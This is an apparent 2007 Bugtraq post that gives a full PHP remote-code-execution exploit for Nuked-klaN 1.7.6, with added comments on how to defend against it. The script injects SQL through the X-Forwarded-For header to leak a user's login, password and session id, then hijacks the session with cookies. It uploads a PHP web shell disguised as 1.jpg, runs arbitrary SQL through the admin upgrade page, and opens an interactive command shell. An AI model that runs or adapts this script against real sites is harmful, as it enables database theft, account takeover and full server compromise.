Message-ID: <20070505155651.15231.qmail@securityfocus.com>
Date: 5 May 2007 15:56:51 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Nuked-klaN 1.7.6 Remote Code Execution Exploit
<?php
#
# Nuked-klaN 1.7.6 Remote Code Execution Exploit
# ------------------------------------------------
# Author: DarkFig <gmdarkfig@...il.com>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Held privately for two months before publication.
#
# Reviewer summary (defender's reading of the chain this script drives):
#   1. The X-Forwarded-For request header is concatenated, unescaped, into a
#      SQL statement on the server; the script uses that to read one user row
#      and a matching session id back out of the database.
#   2. The leaked ids are replayed as cookies, i.e. the session is hijacked,
#      no credential is ever presented.
#   3. A file named 1.jpg but containing PHP is uploaded through the user
#      preference form, and the admin "mysql upgrade" page is used to run
#      arbitrary SQL that points a block's type at that file.
#   Mitigations: parameterised queries (request headers are untrusted input
#   exactly like GET/POST), server-side validation of uploaded image content
#   with storage outside the web root, and no execution of client-supplied
#   SQL even for administrators. Detection: quotes or SQL keywords inside
#   X-Forwarded-For, non-image bytes in avatar uploads, and POSTs to
#   ?file=Admin&page=mysql&op=upgrade_db.
#
error_reporting(E_ALL ^ E_NOTICE); # Notices are hidden on purpose: the bare-word keys
                                   # (frmdt_url, frmdt_filename, frmdt_content) used in the
                                   # form-data array below rely on PHP's old "undefined
                                   # constant -> string" fallback, a fatal Error on PHP 8.
require("phpsploitclass.php"); # HTTP helper class, not part of this file; the latest
# version can be downloaded from acid-root.new.fr.
$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # target base url
$prx = ''; # proxy <proxyip>:<proxyport>
$pra = ''; # proxy basic authentication <proxyuser:proxypwd>
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);
$config = array();
$config[] = 'nuked'; # [0] table prefix
$config[] = 'nuked'; # [1] cookie prefix
$config[] = 'ORDER by date LIMIT 1'; # [2] sql conditions choosing which user row is read
$config[] = 'HAK'; # [3] marker wrapped around each leaked value, length <= 3
$config[] = '<?php'."\n" # [4] body of the file uploaded as 1.jpg: a PHP stub that
.'error_reporting(0);'   #     evals the 'Shell' request header (see the loop at the end)
.'if(isset($_SERVER[HTTP_SHELL]))'
.'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}'
.'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';
$request = array();
# Each entry is the tail of a CONCAT() argument list: marker+digit, a subselect
# that leaks one value, marker+digit again. preg_match_all below cuts the value
# out of whatever page the server renders the stored row into.
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";
for($i=0;$i<count($request);$i++)
{
# The header value looks like the continuation of a VALUES list (random id,
# 2, a far-future timestamp, '' and the CONCAT subselect); the trailing '#'
# comments out the remainder of the server's statement. That the value lands
# in SQL unescaped is the vulnerability: X-Forwarded-For is attacker-chosen.
$deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT(";
$sql = $deb.$request[$i]."))) #";
$xpl->addheader("X-Forwarded-For",$sql);
$xpl->get($url);
$xpl->reset('header');
}
# The leaked values are expected to be echoed back somewhere in the page body.
if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))
die("Exploit Failed");
$what = array("login","passwd","user_id","session");
for($i=0;$i<count($what);$i++)
print "\n".$what[$i]." -> ".$matches[2][$i];
if(empty($matches[2][3]))
exit("\nNo session found");
# Session hijack: the leaked user id and session id are replayed as cookies, so
# everything below runs as that user without a password ever being checked.
# A server-side session bound to more than a database row id would stop this.
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);
# Multipart upload through the user-preference form: the file keeps a .jpg name
# but carries $config[4]. Checking the uploaded bytes are an image (not just the
# name) and storing uploads in a non-executable location defeats this step.
$phpc = array(
frmdt_url => $url.'?file=User&op=update_pref',
'fichiernom' => array(frmdt_filename => '1.jpg',
frmdt_content => $config[4]));
$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
$xpl->get($url.'?file=User&op=edit_pref');
# Recover the server-side name of the stored upload from the edit form.
if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";
$sql = array();
# The admin upgrade_db page executes whatever SQL is posted as 'upgrade='.
# The type column is widened so the path fits, then block 1's type is pointed
# at the upload by a relative path ending in a NUL byte, so whatever suffix the
# application appends when it includes the block is dropped (PHP >= 5.3.4
# rejects NUL bytes in filesystem paths, which breaks this). The final DELETE
# presumably clears the rows the injected header created. One statement
# (avatar_upload) is left commented out in the original.
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";
for($i=0;$i<count($sql);$i++)
$xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db','upgrade='.$sql[$i]);
# Interactive loop: each line typed is sent in the 'Shell' header that the
# uploaded stub evals, and its output is cut out between the 123456789 markers.
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
# 0'); include('./conf.inc.php'); print $global['db_pass']; //
$xpl->reset('header');
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($url);
$data = explode('123456789',$xpl->getcontent());
print $data[1]."\n\$shell> ";
}
# Spells out every byte of $data as a MySQL CHAR(...) expression, so a value
# can be placed in a statement without quote characters. An empty string
# yields 'CHAR()'.
function char($data)
{
    # unpack('C*') gives one unsigned byte per element; empty input gives [].
    $bytes = unpack('C*', $data);
    return 'CHAR(' . implode(',', $bytes) . ')';
}
?>